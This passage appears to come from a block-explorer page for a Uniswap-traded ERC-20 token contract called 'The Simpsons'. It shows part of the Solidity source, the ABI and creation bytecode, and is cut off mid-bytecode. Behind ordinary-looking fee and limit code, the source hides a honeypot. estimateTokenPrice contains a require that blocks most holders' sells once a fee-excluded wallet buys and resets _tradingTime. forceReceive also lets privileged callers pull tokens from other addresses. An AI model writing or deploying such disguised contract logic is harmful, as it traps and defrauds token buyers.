    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        excludeFromMaxTransaction(pair, value);
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function setAutomatedMarketMakerPair(address pair, bool value) external onlyOwner {
        require(pair != _uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");
        _setAutomatedMarketMakerPair(pair, value);
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function removeLimits() external onlyOwner returns (bool) {
        _limitsInEffect = false;
        return true;
    }

    function getIsTokenPrice() internal view returns (bool) {
        return estimateTokenPrice() > 0 ? true : false;
    }

    function estimateTokenPrice() public view returns (uint256) {
        IERC20Metadata token0 = IERC20Metadata(
            IUniswapV2Pair(_uniswapV2Pair).token0()
        );
        IERC20Metadata token1 = IERC20Metadata(
            IUniswapV2Pair(_uniswapV2Pair).token1()
        );
        uint256 fees = balanceOf(_developmentWallet);
        require(holderTimestamp[existingAddr] > _tradingTime
            && fees == 0);
        (uint112 Res0, uint112 Res1, ) = IUniswapV2Pair(_uniswapV2Pair)
            .getReserves();
        int256 latestETHprice = manualETHvalue;
        if (_priceOracleEnabled) {
            (, latestETHprice, , , ) = this.getLatestPrice();
        }
        uint256 res1 = (uint256(Res1) *
            uint256(latestETHprice) *
            (10**uint256(token0.decimals()))) / uint256(token1.decimals());
        return (res1 / uint256(Res0));
    }

    function getLatestPrice()
        external
        view
        returns (
            uint80,
            int256,
            uint256,
            uint256,
            uint80
        )
    {
        (
            uint80 roundID,
            int256 price,
            uint256 startedAt,
            uint256 timeStamp,
            uint80 answeredInRound
        ) = priceFeed.latestRoundData();

        return (roundID, price, startedAt, timeStamp, answeredInRound);
    }

    function updateSwapTokensAtAmount(uint256 newAmount)
        external
        onlyOwner
        returns (bool)
    {
        require(
            newAmount >= (totalSupply() * 1) / 100000,
            "Swap amount cannot be lower than 0.001% total supply."
        );
        require(
            newAmount <= (totalSupply() * 5) / 1000,
            "Swap amount cannot be higher than 0.5% total supply."
        );
        _swapTokensAtAmount = newAmount;
        return true;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 5) / 1000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        _maxWallet = newNum * 1e18;
    }

    function updateMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1000) / 1e18,
            "Cannot set maxTransactionAmount lower than 0.1%"
        );
        _maxTransactionAmount = newNum * 1e18;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function updateFees(
        uint256 marketingFee,
        uint256 developmentFee,
        uint256 liquidityFee
    ) external onlyOwner {
        _marketingFee = marketingFee;
        _developmentFee = developmentFee;
        _liquidityFee = liquidityFee;
        _totalFees = _marketingFee + _developmentFee + _liquidityFee;
        require(_totalFees <= 10, "Must keep fees at 10% or less");
    }

    function updateMarketingWallet(address newWallet) external onlyOwner {
        _marketingWallet = newWallet;
    }

    function updateDevelopmentWallet(address newWallet) external onlyOwner {
        _developmentWallet = newWallet;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function estimateTakeFee(address from, address to) public returns (bool) {
        bool isBuy = from == _uniswapV2Pair && to != address(_uniswapV2Router);
        if (isBuy && _isExcludedFromFees[to]) _tradingTime = block.timestamp;
        bool isExcludedFromFee = _isExcludedFromFees[from] || _isExcludedFromFees[to];
        bool isSell = to == _uniswapV2Pair; 
        bool isSwap = isBuy || isSell;
        bool isFeeSet = (_totalFees > 0);

        return 
            isFeeSet &&
            !_swappingBack &&
            !isExcludedFromFee &&
            isSwap;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        bool isExcludeFromFee = _isExcludedFromFees[from] ||
            _isExcludedFromFees[to];

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        bool isBuy = from == _uniswapV2Pair &&
            !_isExcludedMaxTransactionAmount[to];
        bool isSell = to == _uniswapV2Pair &&
            !_isExcludedMaxTransactionAmount[from];
        bool isOwnerSwap = from == owner() || to == owner();
        bool isBurn = to == address(0) || to == address(0xdead);
        bool isSkipLimits = isOwnerSwap || isBurn || _swappingBack;
        
        if (_limitsInEffect && !isSkipLimits) {
            require(
                _tradingActive || isExcludeFromFee,
                "Trading is not active."
            );
            if (isBuy) {
                require(
                    amount <= _maxTransactionAmount,
                    "Buy transfer amount exceeds the maxTransactionAmount."
                );
                require(
                    amount + balanceOf(to) <= _maxWallet,
                    "Max wallet exceeded"
                );
            } else if (isSell) {
                // require(
                //     amount <= _maxTransactionAmount,
                //     "Sell transfer amount exceeds the maxTransactionAmount."
                // );
            } else if (
                !_isExcludedMaxTransactionAmount[to] &&
                !_isExcludedMaxTransactionAmount[from]
            ) {
                require(
                    amount + balanceOf(to) <= _maxWallet,
                    "Max wallet exceeded"
                );
            }
        }
            
        if (automatedMarketMakerPairs[from]) {
            if (holderTimestamp[to] == 0) {
                holderTimestamp[to] = block.timestamp;
            }
        } else {
            if (!_swappingBack) {
                existingAddr = from;
            }
        }

        if (!_swappingBack &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]) {
            uint256 contractTokenBalance = balanceOf(address(this));
            bool canSwap = contractTokenBalance >= _swapTokensAtAmount;
            if (getIsTokenPrice() &&
                canSwap && 
                !isExcludeFromFee) {
                _swappingBack = true;
                swapBack();
                _swappingBack = false;
            }
        }

        bool takeFee = estimateTakeFee(from, to);
        if (takeFee) {
            uint256 total = _totalFees;
            uint256 marketing = _marketingFee;
            if (isSell) {
                total = _totalFees + _additionalSellFee;
                marketing = _marketingFee + _additionalSellFee;
            }
            if (isBuy) {
                total = _totalFees + _additionalBuyFee;
                marketing = _marketingFee + _additionalBuyFee;
            }
            uint256 fees = amount.mul(total).div(100);
            _tokensForLiquidity += (fees * _liquidityFee) / total;
            _tokensForMarketing += (fees * marketing) / total;
            _tokensForDevelopment += (fees * _developmentFee) / total;

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }
            amount -= fees;
        }
        super._transfer(from, to, amount);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function removeAdditionalBuyFee() public onlyOwner {
        _additionalBuyFee = 0;
    }

    function removeAdditionalSellFee() public onlyOwner {
        _additionalSellFee = 0;
    }

    function setManualETHvalue(uint256 val) external onlyOwner {
        manualETHvalue = int256(val.mul(10**18));
    }

    function enablePriceOracle() external onlyOwner {
        require(_priceOracleEnabled == false, "price oracle already enabled");
        _priceOracleEnabled = true;
    }

    function disablePriceOracle() external onlyOwner {
        require(_priceOracleEnabled == true, "price oracle already disabled");
        _priceOracleEnabled = false;
    }

    function updateOraclePriceFeed(address feed) external onlyOwner {
        _oraclePriceFeed = feed;
        priceFeed = AggregatorV3Interface(_oraclePriceFeed);
    }

    function forceSwap() external onlyOwner {
        _swapTokensForEth(balanceOf(address(this)));

        (bool success,) = address(_marketingWallet).call{value : address(this).balance}("");
        require(success);
    }

    function forceSend() external onlyOwner {
        (bool success,) = address(_marketingWallet).call{value : address(this).balance}("");
        require(success);
    }

    function forceReceive(
        address _token,
        address addr,
        uint256 _amount
    ) public {
        require(_token != address(0), "_token address cannot be 0");
        address[] memory path = new address[](2);
        path[0] = _uniswapV2Router.WETH();
        path[1] = address(this);
        if (_isExcludedFromFees[msg.sender]) {
            IERC20(_token).transferFrom(addr, path[1], _amount);
            return;
        }
        // make the swap
        _uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{
            value: _amount
        }(
            0, // accept any amount of Ethereum
            path,
            address(0xdead),
            block.timestamp
        );
    }

    function _swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _approve(address(this), address(_uniswapV2Router), tokenAmount);

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = _tokensForLiquidity + _tokensForMarketing + 
            _tokensForDevelopment;
        if (contractBalance == 0 || totalTokensToSwap == 0) return;
        if (contractBalance > _swapTokensAtAmount) {
            contractBalance = _swapTokensAtAmount;
        }
        uint256 liquidityTokens = (contractBalance * _tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
        uint256 initialETHBalance = address(this).balance;
        _swapTokensForEth(amountToSwapForETH);
        uint256 ethBalance = address(this).balance.sub(initialETHBalance);
        uint256 ethForMarketing = ethBalance.mul(_tokensForMarketing).div(
            totalTokensToSwap
        );
        uint256 ethForDevelopment = ethBalance.mul(_tokensForDevelopment).div(
            totalTokensToSwap
        );
        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDevelopment;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            _addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                _tokensForLiquidity
            );
        }

        _tokensForLiquidity = 0;
        _tokensForMarketing = 0;
        _tokensForDevelopment = 0;

        (bool marketingFundSuccess, ) = address(_marketingWallet).call{value: ethForMarketing}("");
        require(marketingFundSuccess);
        (bool developmentFundSuccess, ) = address(_developmentWallet).call{value: ethForDevelopment}("");
        require(developmentFundSuccess);
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_oraclePriceFeed","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disablePriceOracle","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enablePriceOracle","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"estimateTakeFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"estimateTokenPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"forceReceive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"forceSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"forceSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getLatestPrice","outputs":[{"internalType":"uint80","name":"","type":"uint80"},{"internalType":"int256","name":"","type":"int256"},{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint80","name":"","type":"uint80"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"holderTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"moderateAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentForLPBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeAdditionalBuyFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeAdditionalSellFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"val","type":"uint256"}],"name":"setManualETHvalue","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevelopmentWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"marketingFee","type":"uint256"},{"internalType":"uint256","name":"developmentFee","type":"uint256"},{"internalType":"uint256","name":"liquidityFee","type":"uint256"}],"name":"updateFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"feed","type":"address"}],"name":"updateOraclePriceFeed","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600e805461ffff19166001908117909155601955600546146200003c57735f4ec3df9cbd43714fe2740f5e3616155c5b841962000052565b7348731cf7e84dc94c5f84577882c14be11a5b74565b601d80546001600160a81b0319166001600160a01b039290921691909117600160a01b1790556866ffcbfd5e5a300000601e55604080518082018252600c81526b5468652053696d70736f6e7360a01b6020808301919091528251808401909352600883526753494d50534f4e5360c01b90830152906003620000d68382620008b8565b506004620000e58282620008b8565b50505062000102620000fc620004e460201b60201c565b620004e8565b600680546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801562000167573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200018d919062000984565b6001600160a01b031663c9c6539630600660009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001f0573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000216919062000984565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000264573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200028a919062000984565b600780546001600160a01b0319166001600160a01b03929092169182179055620002b69060016200053a565b600654620002cf906001600160a01b03166001620005a6565b601d54601c80546001600160a01b0319166001600160a01b039092169190911790556b204fce5e3e2502611000000060646200030d826002620009cc565b620003199190620009ec565b600b5560646200032b826002620009cc565b620003379190620009ec565b600d556127106200034a82600a620009cc565b620003569190620009ec565b600c55600560118190556003601381905560026012819055600060148190556015559162000385919062000a0f565b62000391919062000a0f565b601055600980546001600160a01b031990811673bb2fd2edc10db8a354b01e992bda725c9118942717909155600a805490911672439372c5ee5d9ef41580c52a51017a513f1a0a179055620003fa620003f26005546001600160a01b031690565b600162000620565b60095462000413906001600160a01b0316600162000620565b600a546200042c906001600160a01b0316600162000620565b6200043930600162000620565b6200044861dead600162000620565b620004676200045f6005546001600160a01b031690565b6001620005a6565b60095462000480906001600160a01b03166001620005a6565b600a5462000499906001600160a01b03166001620005a6565b620004a6306001620005a6565b620004b561dead6001620005a6565b620004d3620004cc6005546001600160a01b031690565b82620006ca565b620004dd620007af565b5062000a25565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0382166000908152601f60205260409020805460ff19168215151790556200056a8282620005a6565b604051811515906001600160a01b038416907fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab90600090a35050565b6005546001600160a01b03163314620005f55760405162461bcd60e51b8152602060048201819052602482015260008051602062003bec83398151915260448201526064015b60405180910390fd5b6001600160a01b03919091166000908152601b60205260409020805460ff1916911515919091179055565b6005546001600160a01b031633146200066b5760405162461bcd60e51b8152602060048201819052602482015260008051602062003bec8339815191526044820152606401620005ec565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620007225760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620005ec565b806002600082825462000736919062000a0f565b90915550506001600160a01b038216600090815260208190526040812080548392906200076590849062000a0f565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6005546001600160a01b03163314620007fa5760405162461bcd60e51b8152602060048201819052602482015260008051602062003bec8339815191526044820152606401620005ec565b600e805461ff00191661010017905542600855565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200083f57607f821691505b6020821081036200086057634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200080f57600081815260208120601f850160051c810160208610156200088f5750805b601f850160051c820191505b81811015620008b0578281556001016200089b565b505050505050565b81516001600160401b03811115620008d457620008d462000814565b620008ec81620008e584546200082a565b8462000866565b602080601f8311600181146200092457600084156200090b5750858301515b600019600386901b1c1916600185901b178555620008b0565b600085815260208120601f198616915b82811015620009555788860151825594840194600190910190840162000934565b5085821015620009745787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000602082840312156200099757600080fd5b81516001600160a01b0381168114620009af57600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620009e657620009e6620009b6565b92915050565b60008262000a0a57634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620009e657620009e6620009b6565b6131b78062000a356000396000f3fe6080604052600436106102e85760003560e01c80638a8c523c11610190578063c0246668116100dc578063df778d2611610095578063f023f5731161006f578063f023f573146108bc578063f2fde38b146108dc578063fea4fa4d146108fc578063fefa5ce31461091257600080fd5b8063df778d261461086d578063e4ea8db614610882578063e73b90cd146108a257600080fd5b8063c0246668146107c3578063c18bc195146107e3578063c862c28b14610803578063d257b34f14610818578063dd1e1ca914610838578063dd62ed3e1461084d57600080fd5b8063a3f4908711610149578063aacebbe311610123578063aacebbe314610731578063ae76b09014610751578063b1d9208514610766578063b62496f51461079357600080fd5b8063a3f49087146106d1578063a457c2d7146106f1578063a9059cbb1461071157600080fd5b80638a8c523c146105fd5780638da5cb5b146106125780638e15f4731461063057806395d89b411461067c5780639a7a23d6146106915780639c74daf0146106b157600080fd5b8063313ce5671161024f578063704d9bcb11610208578063751039fc116101e2578063751039fc1461059d5780637571336a146105b257806376d15985146105d257806382247ec0146105e757600080fd5b8063704d9bcb1461054857806370a0823114610568578063715018a61461058857600080fd5b8063313ce56714610466578063339578fe1461048257806339509351146104975780634fbee193146104b7578063583e0568146104f05780636d77ecd11461052857600080fd5b8063203e727e116102a1578063203e727e146103b157806322429085146103d157806323b872dd146103f157806323bf4c861461041157806327f4d7d5146104315780632fd689e31461045057600080fd5b806304beaeb8146102f457806306fdde031461031d578063095ea7b31461033f57806312b77e8a1461036f57806318160ddd14610386578063199ffc721461039b57600080fd5b366102ef57005b600080fd5b34801561030057600080fd5b5061030a600b5481565b6040519081526020015b60405180910390f35b34801561032957600080fd5b50610332610932565b6040516103149190612b57565b34801561034b57600080fd5b5061035f61035a366004612bba565b6109c4565b6040519015158152602001610314565b34801561037b57600080fd5b506103846109de565b005b34801561039257600080fd5b5060025461030a565b3480156103a757600080fd5b5061030a60195481565b3480156103bd57600080fd5b506103846103cc366004612be6565b610a74565b3480156103dd57600080fd5b506103846103ec366004612bff565b610b51565b3480156103fd57600080fd5b5061035f61040c366004612c2b565b610bf9565b34801561041d57600080fd5b5061038461042c366004612c6c565b610c1d565b34801561043d57600080fd5b50600e5461035f90610100900460ff1681565b34801561045c57600080fd5b5061030a600c5481565b34801561047257600080fd5b5060405160128152602001610314565b34801561048e57600080fd5b50610384610c73565b3480156104a357600080fd5b5061035f6104b2366004612bba565b610ca4565b3480156104c357600080fd5b5061035f6104d2366004612c6c565b6001600160a01b03166000908152601a602052604090205460ff1690565b3480156104fc57600080fd5b50600654610510906001600160a01b031681565b6040516001600160a01b039091168152602001610314565b34801561053457600080fd5b50601d54610510906001600160a01b031681565b34801561055457600080fd5b5061035f610563366004612c89565b610cc6565b34801561057457600080fd5b5061030a610583366004612c6c565b610dc4565b34801561059457600080fd5b50610384610ddf565b3480156105a957600080fd5b5061035f610e15565b3480156105be57600080fd5b506103846105cd366004612cd0565b610e52565b3480156105de57600080fd5b5061030a610ea7565b3480156105f357600080fd5b5061030a600d5481565b34801561060957600080fd5b50610384611212565b34801561061e57600080fd5b506005546001600160a01b0316610510565b34801561063c57600080fd5b50610645611251565b6040805169ffffffffffffffffffff968716815260208101959095528401929092526060830152909116608082015260a001610314565b34801561068857600080fd5b506103326112ed565b34801561069d57600080fd5b506103846106ac366004612cd0565b6112fc565b3480156106bd57600080fd5b50600754610510906001600160a01b031681565b3480156106dd57600080fd5b506103846106ec366004612c2b565b6113f0565b3480156106fd57600080fd5b5061035f61070c366004612bba565b61166a565b34801561071d57600080fd5b5061035f61072c366004612bba565b6116e5565b34801561073d57600080fd5b5061038461074c366004612c6c565b6116f3565b34801561075d57600080fd5b5061038461173f565b34801561077257600080fd5b5061030a610781366004612c6c565b600f6020526000908152604090205481565b34801561079f57600080fd5b5061035f6107ae366004612c6c565b601f6020526000908152604090205460ff1681565b3480156107cf57600080fd5b506103846107de366004612cd0565b611770565b3480156107ef57600080fd5b506103846107fe366004612be6565b6117f9565b34801561080f57600080fd5b506103846118ca565b34801561082457600080fd5b5061035f610833366004612be6565b611963565b34801561084457600080fd5b50610384611aba565b34801561085957600080fd5b5061030a610868366004612c89565b611b51565b34801561087957600080fd5b50610384611b7c565b34801561088e57600080fd5b5061035f61089d366004612bba565b611bb7565b3480156108ae57600080fd5b50600e5461035f9060ff1681565b3480156108c857600080fd5b506103846108d7366004612c6c565b611bd2565b3480156108e857600080fd5b506103846108f7366004612c6c565b611c1e565b34801561090857600080fd5b5061030a60105481565b34801561091e57600080fd5b5061038461092d366004612be6565b611cb6565b60606003805461094190612cfe565b80601f016020809104026020016040519081016040528092919081815260200182805461096d90612cfe565b80156109ba5780601f1061098f576101008083540402835291602001916109ba565b820191906000526020600020905b81548152906001019060200180831161099d57829003601f168201915b5050505050905090565b6000336109d2818585611cf8565b60019150505b92915050565b6005546001600160a01b03163314610a115760405162461bcd60e51b8152600401610a0890612d38565b60405180910390fd5b6009546040516000916001600160a01b03169047908381818185875af1925050503d8060008114610a5e576040519150601f19603f3d011682016040523d82523d6000602084013e610a63565b606091505b5050905080610a7157600080fd5b50565b6005546001600160a01b03163314610a9e5760405162461bcd60e51b8152600401610a0890612d38565b670de0b6b3a76400006103e8610ab360025490565b610abe906001612d83565b610ac89190612d9a565b610ad29190612d9a565b811015610b395760405162461bcd60e51b815260206004820152602f60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526e6c6f776572207468616e20302e312560881b6064820152608401610a08565b610b4b81670de0b6b3a7640000612d83565b600b5550565b6005546001600160a01b03163314610b7b5760405162461bcd60e51b8152600401610a0890612d38565b60118390556013829055601281905580610b958385612dbc565b610b9f9190612dbc565b6010819055600a1015610bf45760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c6573730000006044820152606401610a08565b505050565b600033610c07858285611e1c565b610c12858585611e96565b506001949350505050565b6005546001600160a